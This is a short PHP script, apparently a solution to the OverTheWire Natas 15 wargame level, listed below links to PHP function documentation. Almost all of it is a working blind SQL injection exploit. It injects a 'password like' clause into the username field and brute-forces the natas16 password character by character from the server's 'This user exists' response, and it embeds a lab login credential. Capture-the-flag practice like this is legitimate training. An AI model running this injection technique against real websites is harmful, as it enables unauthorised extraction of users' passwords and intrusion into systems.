- file_get_contents: documentation ( source)
- strpos: documentation ( source)
- chr: documentation ( source)
- stream_context_create: documentation ( source)
- base64_encode: documentation ( source)
- http_build_query: documentation ( source)
<?php
function getWebPage($url, $data) {
$context = stream_context_create(array("http" => array("header" => "Authorization: Basic ". base64_encode("natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J"),
"method" => "POST",
"content" => http_build_query($data))));
$data2 = file_get_contents($url, false, $context);
return $data2;
}
function isTrue($result) {
if (strpos($result, "This user exists") > 0)
return true;
else
return false;
}
$password = "";
$url = "http://natas15.natas.labs.overthewire.org/index.php";
for($pwdChar = 1; $pwdChar <= 32; $pwdChar++)
{
for($asciiChar = 48; $asciiChar <= 122; $asciiChar++)
{
$data = array("username" => 'natas16" and password like "'.$password.chr($asciiChar).'%');
if(isTrue(getWebPage($url, $data)))
{
$password .= chr($asciiChar);
echo $password." dude<br/>";
break;
}
}
}
?>